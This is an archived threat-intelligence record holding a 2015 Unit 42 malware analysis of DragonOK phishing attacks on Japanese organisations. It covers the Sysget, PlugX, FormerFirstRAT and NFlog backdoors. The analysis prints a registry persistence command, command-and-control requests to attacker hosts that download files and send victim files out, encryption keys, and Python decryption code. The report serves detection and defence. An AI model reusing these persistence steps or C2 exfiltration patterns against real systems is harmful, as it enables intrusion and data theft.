{ "id": "bbd4970b-4516-4c9a-a318-44763d2cb3f2", "created_at": "2026-04-06T00:22:37.894624Z", "updated_at": "2026-04-10T03:34:17.288862Z", "deleted_at": null, "sha1_hash": "5a43b8909311e74a21a8fa537636dd793c8a23f7", "title": "Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 792250, "plain_text": "Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against\r\nJapanese Targets\r\nBy Jen Miller-Osborn, Josh Grunzweig\r\nPublished: 2015-04-14 · Archived: 2026-04-05 17:26:28 UTC\r\nSummary\r\nPalo Alto Networks Unit 42 used the AutoFocus threat intelligence service to identify a series of phishing attacks against\r\nJapanese organizations. Using AutoFocus to quickly search and correlate artifacts across the collective set of WildFire and\r\nother Palo Alto Networks threat intelligence, we were able to associate the attacks with the group publicly known as\r\n“DragonOK.” [1] These attacks took place between January and March of 2015.\r\nDragonOK has previously targeted Japanese high-tech and manufacturing firms, but we’ve identified a new backdoor\r\nmalware, named “FormerFirstRAT,” deployed by these attackers. See the “Malware Details” section for analysis of the three\r\nRATs and two additional backdoors deployed in this persistent attack campaign.\r\nCampaign Details\r\nThis campaign involved five separate phishing attacks, each carrying a different variant of Sysget malware, also known as\r\nHelloBridge. The malware was included as an attachment intended to trick the user into opening the malware. This included\r\naltering the icon of the executable to appear as other file types (Figure 1) as well as decoy documents to trick users into\r\nthinking they had opened a legitimate file.\r\nFigure 1. Icons used by malicious Sysget attachments.\r\nAll of the Sysget files used in this campaign communicate with a single command and control (C2) server, hosted at\r\nbiosnews[.]info. Sysget communicates with this server using the HTTP protocol; see the Malware Details section for\r\nspecifics of the command and control traffic. All five phishing campaigns targeted a Japanese manufacturing firm over the\r\ncourse of two months, but the final campaign also targeted a separate Japanese high-tech organization. (Figure 2)\r\nFigure 2. Five Sysget samples used to target two Japanese organizations.\r\nFour of the five Sysget variants included a form of decoy document to trick users into believing they had opened a\r\nlegitimate file rather than malware. Two of the executables used decoy documents that included information about\r\nobituaries. Figure 3 shows a GIF file containing an obituary notice for a woman, while Figure 4 shows a Microsoft Word\r\ndocument containing the obituary of a man.\r\nhttp://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/\r\nPage 1 of 10\n\nFigure 3. Japanese decoy document containing an obituary notice for a woman.\r\nFigure 4. Japanese decoy document containing an obituary notice for a woman.\r\nThe Sysget sample with a PDF icon created a second executable, named Adobe.exe, which simply displayed the following\r\nwarning.\r\nFigure 5. Error message generated by Adobe.exe\r\nThe final Sysget sample used a Microsoft Excel icon and opened an Excel document that contained cells filled with\r\n“XXXXXX.” (Figure 6)\r\nhttp://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/\r\nPage 2 of 10\n\nFigure 6. Excel spreadsheet with Xs in multiple rows and columns.\r\nThese Sysget variants appear to be a first stage payload in these attacks. During analysis of this threat, we identified five\r\nadditional backdoor tools hosted on biosnews[.]info which may be downloaded by the Sysget variants once the attackers\r\nhave established a foothold.\r\nThree of the backdoors, NFlog, PoisonIvy, and NewCT have previously been publicly associated with DragonOK.\r\nAdditionally, the actors have now added the popular PlugX backdoor to their toolkit. An additional backdoor appears to be a\r\nnew, custom-built tool, which we have not previously associated with DragonOK or any other attack group. We’ve named\r\nthis tool “FormerFirstRAT” as it appears to be the names used by the developers to refer to their creations. Figure 7 shows\r\nthe relationship between these backdoors and their respective command and control servers.\r\nhttp://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/\r\nPage 3 of 10\n\nFigure 7. Relationship between five additional backdoors used by DragonOK and their C2 servers in this campaign.\r\nThe following section details the functionality of the malware deployed in this campaign.\r\nMalware Details\r\nSysget/HelloBridge\r\nIn this campaign, Sysget samples were attached to e-mails and used various icons to trick users into infecting their systems.\r\nThe majority of these samples are self-extracting executables that contain both a malicious downloader, along with a\r\nlegitimate file. When the self-extracting executable is launched, the downloader and legitimate file are typically dropped in\r\none of the following directories and then executed:\r\n%PROGRAMFILES%\r\n%WINDIR%\\Temp\r\nWhen the malicious downloader is executed, it begins by creating the 'mcsong[]' event in order to ensure one instance is\r\nrunning. It then spawns a new instance of 'C:\\\\windows\\\\system32\\\\cmd.exe' with a window name of 'Chrome-Update'. It\r\nattempts to obtain a handle to this window using the FindWindowW API call and then proceeds to send the following\r\ncommand to this executable. This allows the malware to indirectly execute a command within the cmd.exe process.\r\nreg add hkcu\\software\\microsoft\\windows\\currentversion\\run /v netshare /f /d %temp%\\notilv.exe /t\r\nREG_EXPAND_SZ\r\nThis registry key will ensure an executable that it later downloads is configured to persist across reboots. It then sends the\r\n'exit' command to this executable, which will kill this particular process.\r\nThe malware then attempts to read the following file. This file is used to store a key that is later used to decrypt data\r\nreceived during network communications.\r\n%temp%\\ibmCon6.tmp\r\nIf the file does not exist, it will make the following GET request:\r\nGET /index.php?fn=s4\u0026name=4890c2d546fa48a536b75b48b17de023  \r\nHTTP/1.1\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1;\r\nTrident/6.0)\r\nhttp://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/\r\nPage 4 of 10\n\nHost: biosnews[.]info\r\nConnection: Keep-Alive\r\nThe filename and name parameters are statically set in the above request. The server responds with data similar to the\r\nfollowing:\r\nHTTP/1.1 200 OK\r\nDate: Wed, 11 Mar 2015 00:14:14 GMT\r\nServer: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips\r\nmod_bwlimited/1.4 mod_fcgid/2.3.10-dev\r\nX-Powered-By: PHP/5.4.37\r\nKeep-Alive: timeout=5\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n17\r\ngh204503254\r\n1916733707\r\n0\r\nThe first two pieces of data ('17' and 'gh204503254') are then written to the ibmCon6.tmp file referenced earlier.\r\nThe malware will copy itself to the %TEMP% directory with the executable name of 'notilv.exe'. Due to the previously\r\nwritten registry key, this file will execute when the machine is restarted and the current user logs in.\r\nThe malware then makes the following request:\r\nGET /index.php?fn=s1\u0026uid=fc1a8359e0f4cb8d60920dc066b8b21c\r\nHTTP/1.1\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1;\r\nTrident/6.0)\r\nHost: biosnews[.]info\r\nConnection: Keep-Alive\r\nThe filename and uid parameters are statically set in the above request. The response data is decrypted using the RC4\r\ncryptographic stream cipher. The 'gh204503254' data that was previously downloaded is used as the key. The following\r\nPython code can be used for decryption, using the 'gh204503254' key:\r\nfrom wincrypto import CryptCreateHash, CryptHashData,\r\nCryptDeriveKey, CryptDecrypt\r\nCALG_RC4 = 0x6801\r\nCALG_MD5 = 0x8003\r\nmd5_hasher = CryptCreateHash(CALG_MD5)\r\nCryptHashData(md5_hasher, 'gh204503254')\r\nrc4_key = CryptDeriveKey(md5_hasher, CALG_RC4)\r\nhttp://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/\r\nPage 5 of 10\n\ndecrypted_data = CryptDecrypt(rc4_key, final_data)\r\npp.pprint(decrypted_data)\r\nAt this stage, the remote server can send a number of different responses. The following example response will instruct the\r\nmalware to download a remote executable file:\r\nsys getinto \"filename.exe\" \"01234567890123456789012345678901\";\\n\r\n'filename.exe' is the path where the downloaded file will be stored, and '01234567890123456789012345678901' is the value\r\nsupplied in the subsequent HTTP request. When this command is received, the following example request is made:\r\nGET /index.php?fn=s3\u0026file=01234567890123456789012345678901\r\nHTTP/1.1\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1;\r\nTrident/6.0)\r\nHost: biosnews[.]info\r\nConnection: Keep-Alive\r\nAt this point, the remote server will respond with an unencrypted file that the malware saves to the system.\r\nThe remote server can also send the following example response. This response will instruct the malware to upload the\r\nspecified file:\r\nsys upto \"filename.exe\";\\n\r\nAn example upload request can be seen below:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\nPOST /index.php?fn=s2\u0026item=70efdf2ec9b086079795c442636b55fb\r\nHTTP/1.1\r\nAccept: text/html, application/xhtml+xml, */*\r\nContent-Type: multipart/form-data; boundary=---------------------------d5340oqbasdfaa\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1;\r\nTrident/6.0)\r\nHost: biosnews[.]info\r\nContent-Length: 115126\r\nConnection: Keep-Alive\r\n-----------------------------d5340oqbasdfaa\r\nContent-Disposition: form-data; name=\"file\";\r\nfilename=\"calc_malware.exe\"\r\nContent-Type: application/octet-stream\r\n[BINARY_DATA]\r\n-----------------------------d5340oqbasdfaa\r\nContent-Disposition: form-data; name=\"path\"\r\n70efdf2ec9b086079795c442636b55fb\r\n-----------------------------d5340oqbasdfaa\r\nhttp://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/\r\nPage 6 of 10\n\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\nContent-Disposition: form-data; name=\"submit\"\r\nSubmit\r\n-----------------------------d5340oqbasdfaa--\r\nThe remote server can also send the following example response. This response will instruct the malware to execute the\r\ngiven command:\r\nThe results of this -execution are stored in a temporary text file in the %TEMP% directory. These results are encrypted using\r\nthe same technique mentioned previously. An example upload of these results can be seen below:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\nPOST /index.php?fn=s2 HTTP/1.1\r\nAccept: text/html, application/xhtml+xml, */*\r\nContent-Type: multipart/form-data; boundary=---------------------------d5340oqbasdfaa\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1;\r\nTrident/6.0)\r\nHost: biosnews[.]info\r\nContent-Length: 1609\r\nConnection: Keep-Alive\r\n-----------------------------d5340oqbasdfaa\r\nContent-Disposition: form-data; name=\"file\";\r\nfilename=\"C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\.txt\"\r\nContent-Type: application/octet-stream\r\n[BINARY_DATA]\r\n-----------------------------d5340oqbasdfaa\r\nContent-Disposition: form-data; name=\"path\"\r\n70efdf2ec9b086079795c442636b55fb\r\n-----------------------------d5340oqbasdfaa\r\nContent-Disposition: form-data; name=\"submit\"\r\nSubmit\r\n-----------------------------d5340oqbasdfaa—\r\nPlugX\r\nhttp://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/\r\nPage 7 of 10\n\nPlugX is a backdoor that is often used by actors in targeted attacks. This version of PlugX attempts to disguise itself as a\r\nSymantec product. The following icon is present in this sample:\r\nFigure 8. PlugX file uses Symantec logo icon.\r\nUpon execution, the malware will install itself as a service with the following parameters:\r\nService Name RasTls\r\nService Display Name RasTls\r\nService Description Symantec 802.1x Supplicant\r\nIt may also set the following registry key for persistence:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\RasTls - %windir%\\system32\\svchost.exe\r\nPlugX is a well-studied malware family with a long history of use in targeted attacks. More information on its history is\r\navailable at the following links.\r\nhttps://www.fireeye.com/blog/threat-research/2014/07/pacific-ring-of-fire-plugx-kaba.html\r\nhttp://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf\r\nhttps://www.blackhat.com/docs/asia-14/materials/Haruyama/Asia-14-Haruyama-I-Know-You-Want-Me-Unplugging-PlugX.pdf\r\nFormerFirstRAT\r\nThis remote administration tool (RAT) is referred to as “FormerFirstRAT” by its authors. FormerFirstRAT communicates\r\nusing unencrypted HTTP over port 443; the use of mismatching ports and communication protocols is not uncommon in\r\ntargeted attack campaigns. In addition, port / protocol mis-match traffic can be an indicator of bad activity.\r\nWhen the malware starts, it writes the following registry key to ensure persistence:\r\n[HKCU|HKLM]\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\WmdmPmSp -\u003e EXE of DLL\r\nThe malware then proceeds to send an HTTP POST request with information about the victim system. The following\r\ninformation is collected:\r\nVictim IP address\r\nUsername\r\nAdministrative privileges\r\nRAT status (active/sleep)\r\nRAT version (in this case, 0.8)\r\nMicrosoft Windows version\r\nUserID (Volume Serial followed by an underscore and a series of '1's)\r\nLanguage\r\nThe following settings are used for command and control:\r\nHostname: https.reweblink.com\r\nPort: 443\r\nTimer: 180000\r\nMethod: POST\r\nThe malware encrypts network communication using the AES128 encryption cipher. It uses the MD5 of 'tucwatkins' in order\r\nto generate the key. All data is sent via HTTP POST requests. While not a distinct TTP, the author of this malware may be a\r\nsoap-opera fan. The following code demonstrates how you can decrypt the malware communications using Python:\r\nhttp://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/\r\nPage 8 of 10\n\nfrom wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptEncrypt, CryptDecrypt\r\nCALG_AES_128 = 0x660e\r\nCALG_MD5 = 0x8003\r\ndata = \"...\" # Encrypted Data\r\nmd5_hasher = CryptCreateHash(CALG_MD5)\r\nCryptHashData(md5_hasher, 'tucwatkins')\r\naes_key = CryptDeriveKey(md5_hasher, CALG_AES_128)\r\ndecrypted_data = CryptDecrypt(aes_key, data)\r\nThe malware then enters a loop where it will send out periodic requests to the remote server. The remote server has the\r\nability to respond and provide instructions to the RAT. We have identified the following functionalities:\r\nModify sleep timer between requests\r\nExecute a command and return the command output\r\nBrowse the file system\r\nDownload files\r\nDelete files\r\nExfiltrate victim information\r\nAn example HTTP POST request can be seen below.\r\nPOST / HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;\r\n.NET CLR  1.1.4322)\r\nHost: https.reweblink.com:443\r\nContent-Length: 48\r\nCache-Control: no-cache\r\n[encrypted binary data]\r\nNFlog\r\nWhen loaded inside of a running process, NFlog begins by spawning a new thread. This new thread is responsible for all\r\nmalicious activities produced by this DLL. Initially, the malware will set the following registry key:\r\nHKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\update : [current_executable_filename]\r\nWhere [current_executable_filename] is the path to the current running executable, which is acquired via a call to\r\nGetModuleFileNameA. This registry key ensures that the malware will persist across reboots when the current user logs in.\r\nMultiple string obfuscation routines are included in this malware sample. Strings contained in the binary are decrypted via a\r\nsimple binary XOR against a single byte key of 0x25.\r\nThe malware proceeds to create a named event object of 'GoogleZCM' and uses this event in order to ensure only one\r\ninstance of this malware is running at a given time.\r\nThe malware proceeds to make an attempt at binding to the local host on port 1139.\r\nThe malware attempts to ensure Internet connectivity by making a request to www.microsoft.com. An example request is\r\nshown below.\r\nGET / HTTP/1.1\r\nhttp://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/\r\nPage 9 of 10\n\nUser-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1)\r\nHost: www.microsoft.com\r\nCache-Control: no-cache\r\nCookie: WT_NVR=0=/:1=genuine:2=genuine/validate; MC1=GUID=aa8ac5ed26b9bf4f8d3bd1b2dcaa82f6\u0026HASH=edc5\u0026LV=201503\u0026V=4\u0026LU\r\nfd8c6b7df7c3:lv=1427375812454:ss=1427375780673;\r\noptimizelySegments=%7B%222130980600%22%3A%22true%22%2C%222098371093%22%3A%22true%22%2C%22223040836%22%3A%22se\r\noptimizelyEndUserId=oeu1427379528348r0.49006120319115387; MUID=07660815420F6D5B2DCC0F63434A6C60\r\n%3\r\nSource: http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/\r\nhttp://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" ], "report_names": [ "unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets" ], "threat_actors": [ { "id": "5ffe400c-6025-44c2-9aa1-7c34a7a192b0", "created_at": "2023-01-06T13:46:38.469688Z", "updated_at": "2026-04-10T02:00:02.987949Z", "deleted_at": null, "main_name": "DragonOK", "aliases": [ "Moafee", "BRONZE OVERBROOK", "G0017", "G0002", "Shallow Taurus" ], "source_name": "MISPGALAXY:DragonOK", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7ebda3c6-1789-4d84-97cf-47fb18a0cb28", "created_at": "2022-10-25T15:50:23.78829Z", "updated_at": "2026-04-10T02:00:05.415039Z", "deleted_at": null, "main_name": "DragonOK", "aliases": [ "DragonOK" ], "source_name": "MITRE:DragonOK", "tools": [ "PoisonIvy", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "593dd07d-853c-46cd-8117-e24061034bbf", "created_at": "2025-08-07T02:03:24.648074Z", "updated_at": "2026-04-10T02:00:03.625859Z", "deleted_at": null, "main_name": "BRONZE OVERBROOK", "aliases": [ "Danti ", "DragonOK ", "Samurai Panda ", "Shallow Taurus ", "Temp.DragonOK " ], "source_name": "Secureworks:BRONZE OVERBROOK", "tools": [ "Aveo", "DDKONG", "Godzilla Webshell", "HelloBridge", "IsSpace", "NFLog Trojan", "PLAINTEE", "PlugX", "Rambo" ], "source_id": "Secureworks", "reports": null }, { "id": "340d1673-0678-4e1f-8b75-30da2f65cc80", "created_at": "2022-10-25T16:07:23.552036Z", "updated_at": "2026-04-10T02:00:04.653109Z", "deleted_at": null, "main_name": "DragonOK", "aliases": [ "Bronze Overbrook", "G0017", "Shallow Taurus" ], "source_name": "ETDA:DragonOK", "tools": [ "Agent.dhwf", "CT", "Chymine", "Darkmoon", "Destroy RAT", "DestroyRAT", "FF-RAT", "FormerFirstRAT", "Gen:Trojan.Heur.PT", "HTran", "HUC Packet Transmit Tool", "HelloBridge", "IsSpace", "KHRAT", "Kaba", "Korplug", "Mongall", "NFlog", "NewCT", "NfLog RAT", "PlugX", "Poison Ivy", "Rambo", "RedDelta", "SPIVY", "Sogu", "SysGet", "TIGERPLUG", "TVT", "Thoper", "TidePool", "Xamtrav", "brebsd", "ffrat", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434957, "ts_updated_at": 1775792057, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5a43b8909311e74a21a8fa537636dd793c8a23f7.pdf", "text": "https://archive.orkl.eu/5a43b8909311e74a21a8fa537636dd793c8a23f7.txt", "img": "https://archive.orkl.eu/5a43b8909311e74a21a8fa537636dd793c8a23f7.jpg" } }